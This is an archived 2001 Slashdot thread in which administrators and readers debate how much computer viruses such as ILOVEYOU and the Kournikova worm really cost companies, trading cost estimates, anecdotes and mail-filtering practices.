Forgot your password?
typodupeerror
United States

How Much Do Computer Virus Attacks Really Cost? 325

Posted by Cliff
from the let's-get-some-cost-analysis-on-that-17B-figure,-Bob! dept.
An Anonymous Coward asks: "I'm presently doing a research project on the actual cost of computer viruses to companies within the U.S. Computer Economics, a research firm out of Carlsbad, California, has released statistics suggesting that virus attacks have cost U.S. businesses $17.1 Billion in 2000. That figure has gone on to be quoted in a number of other publications such as an article in Information Week magazine, but beyond a simple explanation, statistics aren't presented to back up this claim. How much have virus attacks cost you or your company?" To be honest with you, I too would like to see the mathematics behind this claim.
This discussion has been archived. No new comments can be posted.

How Much Do Computer Virus Attacks Really Cost?

Comments Filter:
  • by Anonymous Coward
    I provide tech support for about 20 clients. These include individual home office users, small non-networked offices, a 50-station NT network, and a 10-station W95 peer network. Neither of these networks have any significant firewalling beyond what NAT provides, and their virus scanners aren't updated very often. Maybe 200 computers altogether. In the course of a year, I see perhaps 3 infections, averaging a couple of computers per infection. Cost to remedy, maybe $500 altogether. Cost of preventative measures, maybe another $1000. I don't know about lost time, but the damage is rarely serious, most of the lost time is due to panic. At a guess, worker time lost at at a couple of hours per computer affected (they may lose more time at the computer than that, but usually aren't just sitting there with their thumb up their nose). $20/hr*4hr*6 people=$480, +$500+$1000=$1980. $10/computer/year.
  • by Anonymous Coward
    Your costs will be zero if you use IBM OS/2 Warp. I have never had a virus in the last ten years. Rene
  • by Anonymous Coward
    I think this is an excellent example of a cost MANY people in /. are forgetting to calculate in to their figures. I have received a couple e-mails from my father warning me about possible virii he has sent out because they were dleivered to his company. He had sent out this e-mai lto myself as well as his clients and other busniess contacts. I don't know if it cost the company any money but the possibility still exists. Also, I'd like to point out that educating users is STILL a cost incurred by a virus. The benefit is, hopefully, users will better protect themselves and the cost the business inucrs for the next virus that attacks them will be much less or nothing at all as their users were educated and better prepared to handle the situation themselves.
  • by Anonymous Coward
    Easy, they have a free online scanning service, and I am sure it is phoning home with statistics, etc. I would imagine that all of the antivirus software, and all of Microsofts software has backdoors in it where they can gain information...
  • by The Man (684)
    It costs this, it costs that. So what? There's an easy solution: drop windows. Failing that, put a statement into your new hire/contractor terms of employment agreement to the effect that:

    It is company policy not to open electronic mail messages containing attachments, or to receive or transmit electronic messages of a non-work-related nature. It is agreed by all parties that violating this policy will result in immediate dismissal.
  • If a vb script virus is transmitted by someone opening an 'I love you' or 'AnnaKournekova.jpg' how much productivity are you REALLY losing? They just don't have as much time to waste. I suppose it could have a terrible impact on morale...

    Lord knows my morale plummeted this morning when I discovered that the hot nude pic of Anna Kournikova that somebody had emailed me was, in fact, just some lame Windows virus..

  • At my former employer, Microsoft Outbreak (tm) is NOT used for email, so they're not quite as vulnerable to virii as the typical workplace.

    We spent much more time dealing with Windows-related problems (with 80 users, wipe and reinstall Win9x on 2-3 machines per month) than we did with viruses. So I'd like to see a study on the labor costs of using Windows - it might dwarf the cost of virus infections.

  • What about the buisness that Symantec, MacAffe, and whoever else is in the anti-virus buisness. How much did they pull in for their software? I think that would be much more interesting
  • how much you would give me for my sanity.
    the first thing that goes when the next big virus hits my company is my sanity.
    this is because multiple messages are sent to all saying

    "the message with as a subject line is a virus, don't open it. get your virus update here"

    and then you see 10 messages right after it with the afore mentioned subject.

    I don't know why these people have an email account anyway, they can't f*cking read.

    I hate monday.

    Here you have, ;o)

    damnit.
  • Or, a clue-by-four.
    "We have the right to believe at our own risk any hypothesis that is live enough to tempt our will."

  • Viruses cost people time - time that they could be working on something else, like "real work", not maintence.


    Correct me if I'm wrong, but isn't the "real work" of a sysadmin exactly that - maintenence?

    --
  • Remember your monthly maintance on your Windows box, reinstall it monthly....most people don't....so they are saving money by NOT...viruses are a method to force users into submission of reinstalling Windows.
  • It doesn't cost my company [spinweb.net] anything because we don't use Windows. Simple. Problem solved.
  • Amusingly enough this is a '4x2' in the UK. (Pronounced "Four be two" if you want to be taken seriously)
  • Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".



    Just a thought here. But doesn't it seem odd that ever 6 months to a year there is a really big email style virus that hits a large majority of the "not so bright" people out there?

    Now most of these viruses don't do allot of damage like the good old viruses that ate the hd as fast as possible. But from what I've seen there is one cost I haven't seen mentiond yet...the virus checker. Ok they aren't teribly expensive, but most people who get these viruses and lack an IT Dept go buy the latest virus checker to fix the problem. Seems like the companies that make virus checkers are quite happy whenever there is a big virus that gets into all the "dense" peoples computers.

    Which brings me to the thought of "what if the virus checker companies made and distributed the virus?". Good for sales, keeps them in business, and keeps the fear alive. But since I don't know anyone working for any of these companies I couldn't give any proof. But it still seems suspitious.
  • by Anonymous Coward
  • by Danse (1026)

    I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

    But those things are not legitimately attributable to viruses. Those are attributable to hiring idiots for admins.

    The rest of your post I agree with.

  • Fah, I have a whole pile of systems that were deemed to be not Y2K compliant. Of all of them one required that the clock be reset, but only under Windows, it runs Linux just fine.

    The rest of the world spent far less on their computer systems, and yet there lights stayed on. Y2K was a myth, for all intents and purposes. But it got rid of a lot of cruft, and it made a bunch of hardware and software companies very wealthy, so it wasn't all bad.

  • The chances of such a worm propagating are essentially nill. The trick worked in this one particular case because you happened to know exactly the software that your friend would be using. If your Applescript were sent to a Mac user that used some other email client it would have simply crashed. There simply aren't enough Mac Eudora users to sustain such a beast.

    You tricked one guy (who you happened to know), but how many of the messages in his inbox were from Eudora using Mac addicts? And of those few who actually use the right type of software how many of them would open up any random jpeg from your buddy without poking at it a little first?

    Microsoft is certainly responsible for creating software with such disregard for security. But it isn't the fact that all of the other email clients in the world are so much more secure that keeps their users from becoming targets, it is the fact that Windows + Outlook has the largest install base. There are scads of gullible Windows users, and there is a good chance that most of the addresses in a typical Windows User's address book are running the same sort of software.

  • There is still lost time. For example, the system administrators probably had something else they needed to be doing. In most of the organizations I have worked for the sysadmins don't just sit around all day playing quake and waiting for a fire. The lost time simply applies to all of the things that the sysadmin could have accomplished if he hadn't been cleaning up viruses. If your systems adminstrators are only busy when you have a virus, eliminating viruses would allow you to cut back on the amount of systems adminstrators that you hire.

    Also, there is the fact that when a virus epidemic hits there are generally more than one system affected. Email servers are shut off, multiple workstations re-formatted and re-seeded. The largest expense of nearly any business is its payroll (in the US anyway). If a part of a company's workforce is unable to work at peak capacity it is squandering it's most costly resource. Viruses often affect entire departments, and can cost real money to a business.

  • The same virus could be written in ECMAScript, aka Javascript, aka JScript.
  • "When you get right down to it, it's really Intel's fault. Their CPUs will run any code, without giving any thought to security... "

    Sorry, x86's since the 80286 have included multi-ring security. Too bad no one ever implemented anything with it...

    sPh
  • "I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.
    Therefore things like software piracy, virus attacks, are not losses."

    That's funny. My coworker and I, who are 100% scheduled from now through April 30th on an ERP implementation for a small manufacturing company, have spent the last three hours (and appear to have about 3 more to go, or a total of 12 manhours) working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny (and yes, I know the users shouldn't have clicked on that). Now, that's 12 manhours down the drain. Plus, when I arrive at the manufacturing site tomorrow, I won't be prepared for the work I was going to do, and another 8 hours or so of everyone's time will be wasted as we try to work through that unprepardness.

    Now, exactly how is that NOT a cost?

    sPh
  • It's ironic that this story should appear on Slashdot just as Yet Another Visual Basic Virus spreads through the address books of everyone who uses that digital Petri dish of an e-mail program called Microsoft Outlook (or, based on the number of virii it spreads, perhaps it should be called Microsoft Outbreak instead).

    The cost of virii is directly proportional to the stubbornness of both users and IT managers who refuse to get rid of programs like Outbreak which have repeatedly demonstrated this sort of problem, with no real remedy on the horizon. Infect me once, shame on you. Infect me twice, shame on me. Infect me three times, and I deserve to die because I'm not taking precautions!
    --
  • We're an MS Enterprise licensing customer - for our licensing fee (which isn't bad), we get the rights to any version of desktop Windows, and version of Office up to Professional, and all server/BackOffice CALs we need.

    Outlook and Exchange come with the territory - it's be tougher for us to substitute a different mail system than the payback would justify.

    Personally, I'd prefer a nice IMAP-based system that is less vulnerable to begin with, but if you manage the system carefully you can make the MS stuff work acceptably well - which is nice when you work at a company that's drank the Microsoft-branded Kool-Aid.

    - -Josh Turiel
  • In 1998, a few months after I took the sysadmin job at my company, we had an infestation of the Class macro virus. It was a pain to clean up and deal with, but my staff and I took care of it in about a day - no data was lost.

    After that, we put up an SMTP scanner/gateway between our Exchange server and the rest of the world. I set up filters to automatically block anything executable at all via e-mail, including stuff like .SHS and .VBS files. We have not had an infection of any sort since then - the antivirus portion of the gateway is updated with every update released (engines and definitions), and the clients are updated through management software that updates automatically as well - and the clients are locked into the most paranoid settings available.

    The downside is that I'm the "no fun" admin (since we block all the fun programs from e-mail), but on the other hand I've counted 26 copies of the "Kournikova" worm today alone that have bounced off our server harmlessly. I think it was worth it for sure. Since I'm stuck with Windows for the forseeable future, I'm happy with what I can do to prevent these from affecting us.

    So our ongoing cost to really deal with viruses is $0. But I do have software costs (annual licenses), plus some time spent devising our strategy and implementing it. But that's part of the job - I can't really call it "virus costs".

    - -Josh Turiel
  • In the U.S. a "two by four" (when not referring to some sort of seating or driven wheels arrangement on a truck), is a piece of lumber, the rectangular cross-section of which measures 1 and 1/2 (one and one-half) (1.5) inches by 3 and 1/2 (three and one-half) (3.5)inches.

    Commercially available lengths usually start at 8 feet (96 inches) going up in length in multiples of 2 feet (24 inches).

    A "stud" is usually 93 inches in length, which means that nailing them at right angles to a 1.5 inch thick bottom, or sole, plate and a 1.5 inch thick top plate results in an 8 foot wall. (In construction the question of when to say "foot" and when to say "feet" is answered "it depends")

    If you remodel a house built in the early 1950's you'll find that the "2x4's" used back then are slightly wider and thicker (by either an eighth or a sixteenth of an inch, don't feel like going out in the rain to the shop to the woodbin with a tape measure just now) and the studs are shorter by double the thickness increase so that the wall is still 96 inches high.

    Extrapolating back there was probably a time when 2x4's were 2 inches by 4 inches wide and thick (or thick and wide).

    In the context of the original post, a 2x4 is a board that you can wrap your hands around and use to beat someone with or threaten to do so.

  • The difference is that the virus is more reliable, works with a wider range of hardware, requires fewer resources, and the author probably won't sue you for reverse engineering it if you can't find the source code.
  • The reason it is a boneheaded over-reaction as a response is that .vbs viruses are easily readable, and the exact nature and extent of their damage and the locations they are placed easily determined. VBS viruses are no more mysterious that a .sh 'virus' would be. Once you remove the responsible files and registry entries, there's no problem.
  • This is true, but completely tangential to what we were talking about: none of the things you describe are remediated by the measure of rebuilding a bunch of desktop machines out of the belief that "unknown" damage can't be repaired by more straightforward mechanisms. All the things you describe are true, but if they happened they would be made obvious by looking at the payload.
  • That's funny. My coworker and I, ... have spent the last three hours ... working on the e-mail server because some idiot decided sending out Kourinokava.vbs files was funny. ... Now, that's 12 manhours down the drain.
    ...
    Now, exactly how is that NOT a cost?
    Think of it as an extension of the Microsoft tax, or, alternatively, a tax on stupidity.

    --

  • True. Fortunately, we're practically immune to VB scripts, since we block them at as many places as is feasible. Sadly, we can't really stop the flow of Word documents, but we disable macros, and so on.

    "Real" viruses may have better luck getting in, but we're generally up to date with the updates.

    As for Ghost, we'd use it (in fact, I've been pushing for it), but to get it done legit is expensive. Not a problem to me, but I don't always get the gear/utilities that I want because of price. Oh well.


    Raptor
  • It's been said by others, and *yes* I know that this barely *cough*Redhat*cough* affects Linux users, but how many corporations use Linux for all their employees?
    Under Windows, you do the following:
    a) Install Norton on every machine
    b) Pay for LiveUpdate
    c) Set tight-fisted policy, so that anyone who breaks it realizes that it's their fault, and they *may* get bumped to the bottom of the queue
    d) Use a mail server capable of decent filtering (procmail is excellent for this, and your unix box can relay to Exchange if you *really* need it)
    e) Network profiles and user directories, with a solid backup rotation.

    Of course, everyone here knew that, right?

    I've dealt with this before. We've fixed it in a matter of minutes due to good policy, an extra box lying around, and a tight-fisted reign over the network.

    Raptor
  • Most of our machines run Linux so does are automaticlly virus free. We also use MacOS and Windows which we keep updated with the latest virus scanners. Given that these updates are available for free online and can be automated the cost isn't much. Due to some problems with our old software working under Windows 2000 we've had to switch to Outlook for mail and I feel that may increase our problems but so far it's been nothing big. I'm considering setting up virus scanning at the mail server level (runs Linux) to take care of that problem but that takes very little effort. I'd say viruses cost maybe $100 in upkeep and monitoring a year.
  • We don't really have an accurate measure here. I know what the Love Bug cost ME, since I got to go and clean the little fucker off the dozen or so morons desks that opened it. During that whole time I got to listen to them bitch about how they had nothing to do. They weren't even able to catch the hint that they caused it themselves. Finally, we just told them that we could not have it fixed the same day, and told them to go home. After that we were able to finish the job quickly and easily.

    From a pure production stand-point, we lost some $$ since we shut down the mail-swerver until we fixed it, but still, who knows? We lost a days worth of work for 12 people doing various production-related things, most of a day of my projects which have a direct impact on the entire company rather than a single dept., and we had no email for 6-8 hours which threw a kink into everyones communications. Hard to measure.

    I did get some payback that day. Since we run an email-to-fax gateway, the 3-4 people who had a Contacts list full of fax addresses got to deal with a shit load of calls from irritated correspondants who were getting 10+ page faxes full of I Love You's code.

    --
  • To rephrase Marilyn's Sugardaddy:
    Ask not what viruses
    do cost; ask rather how much they could cost.
    Face it: most viruses (so far as we know) are little more than nuisances. Yes, they cost money because they waste a lot of people's time and bandwidth, but that's about it.

    But what happens when people start writing more insidious virues?

    Say: flip a random bit in a random data file. Those bits add up over a few years, and even if you had two years' accumulated daily backup tapes, it would be nigh impossible to rebuild clean data from them. So what happens when you go to work one day, start troubleshooting a problem, and suddenly discover that you can't trust any of the data on any of your company's computers? And can't even confidently demonstrate which files are corrupt and which aren't?

    Or: suppose someone uses a virus to cover a more sinister attack? The bank's IT staff congratulate themselves at how quickly they squashed a viral attack, not realizing that one of those messages had the same subject line and same .vbs name, but carried an altogether different payload.

    Other scenarios should be easy to come up with as well. The surprise is that the virus writers haven't come up with them yet. (Or haven't they?)

    My point is: yes, headlines probably use grossly inflated figures for the cost of virus attacks, and yes, most of them could be shrugged off as annoying pranks. But will it always be that way? Rather than playing down the seriousness of viruses by pointing out cases of obvious or probable exaggeration, we should be trying to scare the bejesus out of our clients and employeers, before "the big one" comes along.

    --
  • > What's interesting is how it decodes itself from the string.

    I saw something recently about how the anti-virus companies are starting to whinge about how the number of different compression schemes available out there makes it really hard to create signatures for all the viruses. Same virus, different compression ==> different signature required.

    --

  • While we're at it, can we get some independent academic research into other unquestioned numbers such as losses due to piracy?

    These estimates get quoted in a couple articles, then stated in court and suddenly they're real and no one wants to question them.

  • A US "2x4" is a length of softwood building material nominally 2" by 4" in cross-section before planing, actually about 1-3/8" X 3-1/8" (3.5 cm X 6.25 cm approx.) after finishing.

    A 2x4 is also at times known as a "clue stick."
  • No need to annoy the users to update their virus definition files... Norton AntiVirus will do that for you! I imagine McAfee, etc. can do this also.

    And you can set up scheduled virus-scans in your Windows clients, make this part of the standard load image. My notebook Win2K client does it now.

    Hovever, the general vulnerability of MS Windows software to viruses is a _great_ motivator for a company to look into using Linux on the desktops.

    Give me an ever-better Wine to run MS Office apps, plus a Linux version of Lotus Notes, and SecureID SSL encryption ported to Linux, I won't use Win2K!

  • .. is to require the responsible parties to pay for them. By "responsible parties", I'm really referring to two groups of people. First and foremost are, of course, the authors and/or originators of the virus. Certainly, when they unleash a destructive virus on the computing community, they are culpable for much of the damage that is caused. The second group is one that doesn't get discussed a whole lot .. the users who spread the virus. Clearly, the brunt of the blame lies with the virus authors, but surely those "promiscuous" users who allow the virus to spread are partially at fault as well.

    This country (and, in many ways, the entire Western world) has been transformed into a place where there is no such thing as personal responsibility anymore. If you spill a cup of hot coffee on yourself, it's not your fault .. it's the fault of the person that served it to you. If you're daydreaming while walking and trip over a crack in somebody's sidewalk, it's not your fault .. it's the fault of the homeowner. And if you stupidly open an overtly suspicious attachment and unleash Dante's lowest level of Hell on your corporate intranet, it's not your fault, it's the script kiddie that wrote the virus!

    I hereby call "bullshit" on this. People need to be taught a basic modicum of computer security common sense. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued? I'll tell you what: a moron who blindly clicks on and opens every single attachment they get will think twice about it if they have to put a couple of month's worth of mortgage payments on their credit cards because half of their paycheck went to paying the tech support guys to clean up the mess they created.

    Viruses can be thwarted so that their effect is minimal, but this is not going to happen so long as user stupidity is coddled and encouraged and users who do stupid things are allowed to claim that it's "not their fault." It's not their fault that the virus was created, of course, but it is their fault that they did a very stupid thing that cost a lot of people a lot of money. If you start making people pay for their mistakes, you'll find that they wind up making a hell of a lot less mistakes.
  • But surreptitiously releasing a modified copy of "I Love You", we were able to determine with a high degree of accuracy which of our resources were, in fact, complete and total dipshits. After sending out a company wide email with the subject "WARNING: I Love You! DO NOT OPEN! VIRUS INSIDE!", many, many employees (mostly from legal and marketing) were immediately identified as being dipshits. We cut the fat, as it were, and are now a leaner, smarter organization better able to meet the challenges of the 21st century, sans dipshits.

  • The largest costs in the companies that I've seen are: software and meetings.

    Software licensing costs for anti-virus software are huge for a medium-to-large business. Also, the time spent in "what do we, as a company do about virii" is non-trivial.

    In the ideal company, anti-xxxx tactics (where xxxx is any sort of intrusion, theft, vandalism, etc) would be left to the people who do the job, but this is rarely the case.
  • Yeah, a couple of my friends here at work went to NDSU... Being as they have EE degrees, they probably saw a computer or two while they were there, though I don't think I could move that far north - leaving the tropics here (Rochester, MN) would be a harsh shock ;-)

    Now about 'dem hossless carriges... 8^)
    --
  • The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency. This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.
    I would argue the inverse - if a person was able to carry on their "regular" work AND handle the virus incident, you would have an argument for no real cost. But we know that tends not to happen.

    Time is a finite resource that is closely linked to productivity. Productivity is linked to the completion of projects. When one's time is taken up by unscheduled workload (ie: the virus incident), current projects tend to suffer. That means the project either slips or more time has to be thrown at it. Where do you get that time? You hire more people to work the project, increasing the available manhours (time) and increasing the cost.

    Whether these virus scares SHOULD cause such an impact on an organization's available time is an entirely different matter.

  • The announcement went out that no one should use email, I walked around a little bit later looking for my manager (he had asked me to look at the code to the script, find out what it does - not much anymore, other than waste resources, it turns out) - the office was near empty: Everyone went to lunch!

    If that isn't lost money, I don't what is!

    We use Windows (unfortunately) for a lot of our stuff, and most everybody uses Outlook - I use Netscape, and I consequently DON'T HAVE A PROBLEM (Netscape doesn't know what to do with the attachments). Also, I uninstalled Windows Scripting, so that nips it as well.

    I have tried repeatedly to get the IS dept or anyone who would listen to switch to something else, filter VBS scripts at the server - something: All to no avail, so far...

    Worldcom [worldcom.com] - Generation Duh!
  • >http://mast.mcafee.com/mast/mass_map.asp

    The frightening thing to me - how the hell does McAfee get the data that makes up the map?

    If I were running antivirus software, the last thing I'd want is to have it phoning home to tell some third party that I was infected.

    Sounds like a privacy/security nightmare.

  • So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?

    What's boneheaded about it? Can you think of a way requiring LESS down time to make SURE that the virus and anything it corrupted is removed from ANY computer at the company?

    Starting a virus is like starting a fire - in this case one that burns through all the computers that are susceptable. After the fire is out the firemen are going to water the ashes and dig them up to make SURE it's out, and build firebreaks to keep it from relighting from the surrounding area (which may still be burning).
  • You're assuming that $1 in the future is worth $1 today. In reality, the farther into the future you look, the less a dollar then is worth today.

    No, I'm not. I explicitly took that into account with the "bank account" analogy for the time-difference in value of the money.

    The cost in current dollars is the amount you have to put into the interest bearing account, in order to have the money to cover the shortfalls at the time they occur. Future withdrawals are a greater number of dollars then the initial deposit.
  • We had one person get infected with the I Love You virus before we were aware of it and notified people not to open blah blah blah. It took a sysadmin 10 minutes to disinfect the affected computer.

    Sysadmin salary/120,000 minutes worked per year*10 minutes= $4.16

    That's our total loss. If you decide to count the amount of time spent learning about viruses, that means you count the amount of time we spend with Bugtraq every morning, which we would do anyway, so that's a wash.

    Yeah, $4.16. That's about right.
  • Whenever I submitted a project to get funding based on 'productivity gains', they tell me that that 'productivity is an "intangible cost"', and therefore it cannot be used.

    If that's so, then lost productivity because of a down 'down system' also is 'intangible', and therefore has no affect on 'cost'.

    Hey, it's THEIR rules...
  • Actually, believe it or not, Symantec still does not have an update to detect this worm while most of their competitors have had protection since last August. Once again, Symantec is last. Our company killed incoming email several hours ago awaiting an update from Symantec.
  • This one is a harmless worm. Polite even. It even sets a registry flag so it won't run more than once.

    Y'know, it'd be cheaper to just make everyone click it and not have to worry about reinfection than to spend money on a virus scanner. Or hell, less money on bandwidth spent by clicking it than downloading a new definition file.

  • If you have to run outlook, put outlook in the restricted zone. Set restricted zone to turn off, activex, javascript, java, etc.... Don't open attachments that look fishy. I've done these two things and have never gotten a virus (except for once when some other idiot ran an attachement which infected files on network server, and I got the file, but my virus checker caught that and cleaned it up).
    ---
  • The people who care for the systems come and do a reinstall at $60 to $120 an hour. What's a typical system load for Windows (It was solid 8 hours for OS/2 back when I was doing onsite support.)
  • The Q Virus [theregister.co.uk]?

    Seriously though, you can quietly manage the whole thing. You don't have to have the whole company up in arms over it.

  • Many of the figures used in showing how much money businesses use are really off base. For example, take "cyber slacking", the term often used for employees using the Internet at work for fun, not business. They do some survey where they learn the average person says they spend 30 minutes of their work day "cyber slacking". Then they say the average person get paid $15/hour (or whatever) so that's $7.50 per worker per day. If there's 100 million workers, then business is loosing $750 MILLION DOLLARS A DAY!!!! Dumb. Anyway... I hope that's not too off topic but sometimes that's how business thinks. Perhaps with the virus thing they figure out how much their tech people who fix the stuff are paid and then add up the hours spent fixing virus-ridden systems, etc... What they don't take into account is that those tech guys are probably on salary and if they weren't fixing the virus problem, they'd be doing something else.... Like cyber slacking. :)
  • Well, since it's been obscufated, no it isn't very interesting ;-)

    Anyone de-obscufed it?
  • The numbers I most often see go something along these lines: If a company sells $10million a day, and it gets knocked offline for 6 hours they will say they lost $2.5million. Of course this doesn't take into account shifting revenue to that time beyond the actual outage. This is more applicable to a DDOS attack, but companies seem like to latch onto big numbers using simple math.

    The real cost for a single instance of a virus is dealt with mostly costs in overtime for personnel while things are restored, inspected, and placed back into service.

    The real cost overall is having to buy the software to protect against virii, and hiring the people that do nothing but guard the network. These costs don't contribute to the bottom, they merely protect it. This is the real cost of a good virus, it just usually isn't paid until someone catches something (when it should have been paid all along).

  • This just shows how anyone believes any numbers they read.

    Like all other forms of crime, computer viruses actually make money for countless people.
    From the products and salaries of virus companies, to cops salaries, to the salaries of reporters and other media, crime is great for absolutely everyone but a tiny irrelevant minority.


  • I was on site visiting one of our customers in NY when the luv bug virus broke out. I was helping one of the top admins with our product when everyone rushed around shouting that the e-mail server was down. It was thursday at 4 in the pm.


    After a quick survey of the mail server, it was found that it had run out of space. Why? Was it copies of luv bug? No. The director of the IT dept., just before jumping in his car and driving home, had sent an e-mail out to every single alias he could think of warning users to update their virus definitions with the ATTACHED symantec updater. The damn thing was three megs. Because most users were on several different aliases, they all had it copied to their mail boxes as many as eight times. Deleting all those mails from each user's box was a very tedious and time-consuming process, let me tell you.

    This was perhaps the most brilliant protection against a virus infection I have ever witnessed.



    Seth
  • However, I don't think one can include the cost of the antivirus software in your estimate. Even if there were to CIH, Melissa, or Love Bug, we would still be running the software.

    But this doesn't follow. If there were no viruses at all, you wouldn't need to worry about them as a source of data problems, and you wouldn't need to spend the $24 per client for anti-virus software. What that means is that the threat of a virus alone is enough to force you to add costs, so there's a cost associated with viruses even for well run shops that don't actually get infected. It's not a direct cost, but it still exists.

    1. Sure, the virus authors need to be held accountable, but if a virus or e-mail worm paralyzes a corporate intranet for a day and the point of injection can be determined, why not hold that user responsible as well, particularly if a virus alert has already been issued?

    Odd that you should mention this. I did determine which one of my users opened it first. And while I didn't go to the extreme that you said of taking money from his pocket... I did send out a company-wide email jokingly pointing the finger at him (I called him a dead man).

    A little public humiliation can go a long way. I will guarantee you that he'll think twice about opening attachments from now on.

  • Sure, I guess if you dont place any value on your manhood.. I'll take a hundred crappy script kiddie viri rather than touch anything adorned with a multi-colored piece of fruit
  • 1 quarter to call someone who cares for each infected system.

    According to the New McCafee Virus Map:

    Luvbug.vbs infected
    So, 10,000x$0.25 = $2500.00/day

    Therefore - Today, Luvbug.vbs cost Americans $2,500.00 today...
  • ARGH! Slashcode ate my less-than symbol...

    above should read less than 10,000 infected systems
  • I got one copy of the virus, and deleted it. Cost: one minute.

    I read one Slashdot article about viruses (this one), and am responding to it. Cost: two minutes.

    'Nuff said.

  • About 4 or 5 years ago I wouldn't have agreed. I've lost a couple of disks to viruses. You could get some pretty nasty viruses if you knew where to look. Since the late 90's, with the Word Virus, and then these vbs viruses, You're pretty safe, and you're more likely to come to more harm installing things like McCaffe onto your windows computer (where do they get virus map data?).
  • Last year when ILOVEYOU hit I worked for #49 in the Fortune 100. In the aftermath, Management estimated we'd spent 2400 hours of employee time cleaning it up, not to mention our corporate email was down for 3 days.
  • Back of the envelope figures; most of my end users are PCB designers and charge a pretty hefty sum per hour worked.

    When a 'worm' or other VBS mayhem is rampant:

    $ 110 per billable hour (average) x 10 minutes per hour to wade through excess mail $ 11 dollars per end user per hour. x 15 end users $ 165 per hour + 30 bucks an hour for my services = 195 per hour.

    That's when there is an active .VBS worm running loose. These prolems have seldom lasted longer than 2 hours - and that is due to the mail admins living on the West Coast and not being available as soon as the East Coast facilities are hit.

    Otherwise, I'd guestimate that I spend at the most 2 work hours per week on virus and work related issues - that's average. Some weeks more, some weeks less, some weeks none at all.

    Above figures are for a small part of a larger manufacturing concern.

  • So how much of that loss is due to the virus and how much of it is actually due to the boneheaded over-reacting "fix" to the problem?
  • I agree. An intelligent user who is familiar with precautions against virii will probably never be infected. Out of the 10+ years that I've been using MS OS's, I've only ever had a virus once. And that was long ago when a roommate of mine was bring home disks from work and using them on my PC. If you take reasonable precautions, you will be safe.

    Unfortunately, the number of people in the world who fit the description above is approximately 12. Most end-users are so pig-headedly stupid that they wouldn't know a virus if it were wearing a neon sign around it's neck. We actually had one user at my company that opened 7 different messages that had the subject "I love you" on the day of the Love Bug outbreak. And this was that afternoon, when a high priority alert had been sent out by out AV response team that morning!

    People are stupid. In the work environment, we have to try to protect them from themselves. Once they leave the office though, they're on their own.
  • Well if software sites on a shelf and is not sold, it can become a write-off. The value of the write off is cost of production per unit.

    A virus has a cost associated with it. Cost of productivity. Can we write it off. Hmmm software bought to prevent it happening again, extra copnsultants brought into the firm to upgrade systems ....

    That the way i see it.

    How the tax sytems work I don't know but I would not be surprised if some-one could claim it if there was enough proof and well documented claim.

    example:
    Traveling salesman that has full account of his time in a writen ( hand ) log. He/She could put computer down time as a loss of sales and presentation for the amount of days the system was down, proratedly only for the days the computer would be used based on a historical documentation of the hand writen log file.

    there was a great acticle in forbes magazine about how to manage your records for the IRS. This included those people that were gamblers and other types of people that have to keep a written log.

    ONEPOINT



    spambait e-mail
    my web site artistcorner.tv hip-hop music news
    please help me make it better
  • I've deleted a half-dozen virus-containing emails from my inbox within the last half hour -- which means there are at least 6 people in my company stupid enough to open a .VBS attachment!

    The original love letter virus cost millions in lost productivity, because it crashed thousands of (Exchange) mail servers. Also, I lose productivity everytime I reboot, because I have to wait for Norton Virus scan to download new patterns and scan my hard drive. Also, on an older system, the virus scanner interacted with Netware to crash Windows every time it tried to boot up, which cost me several hours of lost work until the IT department finally relented and told me the password to disable the virus scan function!

    Interesting to note, however, that all these costs were incurred only on systems running MICROS~1 software... the more interesting question is "How does the cost of virii to Windows users compare to the cost of virii on non-windows users?"

    Should buffer-overflow (stack smashing) and root exploits be included in the costs analysis? If not, it seems like the costs to Linux users is zero...

  • I think the costs are higher than corporations are willing to admit. I don't know about virus' specificly, but in "Information Warfare" by Winn Schwartau (I think I spelled his last name correctly) he talks about the damage bugs in general do to business. If they admited to the public that there were such problems, their stock integrity would drop drastically.
  • Total damage caused by virus: 1 million dollars Total money spent on people to access cost of virus damage: 16 million dollars.
  • by llywrch (9023) on Monday February 12, 2001 @02:37PM (#437242) Homepage Journal
    I happened to see the O'Reilly book on VB Script this weekend, & was amazed to see their choice for the animal on the cover . . .

    A flu virus?

    The collophon claims this is a drawing of a Sea Urchin. I'm not convinced.

    Geoff
  • by MosesJones (55544) on Monday February 12, 2001 @11:31AM (#437243) Homepage
    What complete tosh.

    Let imagine there are no virii. So I don't need to buy the tools and expertise (not a one off cost as you have to employ extra people to cover you for the virus attacks). So thats the cost before you even talk about time.

    Now in terms of time. The issue is quality time, the people who get hit aren't the bright ones, but the bright ones have to clean it up. So yes I've lost 2 hours of an average persons time, but worst of all I've just lost 1 x n hours of bright people. These people are NOT HAVING A BREAK they are WORKING ON A NON-BILLABLE TASK. Thus the cost is that every hour they work they could be billable.

    Virii cost money, they cost time, and the immature people who write them should spend a little more time trying to develop decent software rather than being their own personal definition of "clever".

    I'll be honest, I grade virus writers several layers below pond scum, the NSA and Barney.
  • by SnakeStu (60546) on Monday February 12, 2001 @11:30AM (#437244) Homepage
    This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

    No, it assumes they're doing it instead of regular work, where regular work is defined as not dealing with the virus. It's a matter of opportunity cost.

    So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

    That's a joke, right? There are no duplicate entries when the person is doing Activity A instead of Activity B.

    Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

    That a given activity is included in a person's job description is irrelevant unless that is the only activity in their job description. The only person who could possibly fall into this strange category you describe would be a "Virus Recovery Specialist" who is hired to do nothing but recover from viruses. But alas, that would put a definite, fixed monetary figure on virus treatment regardless of actual virus instances. Wouldn't the anti-virus software publishers love that!

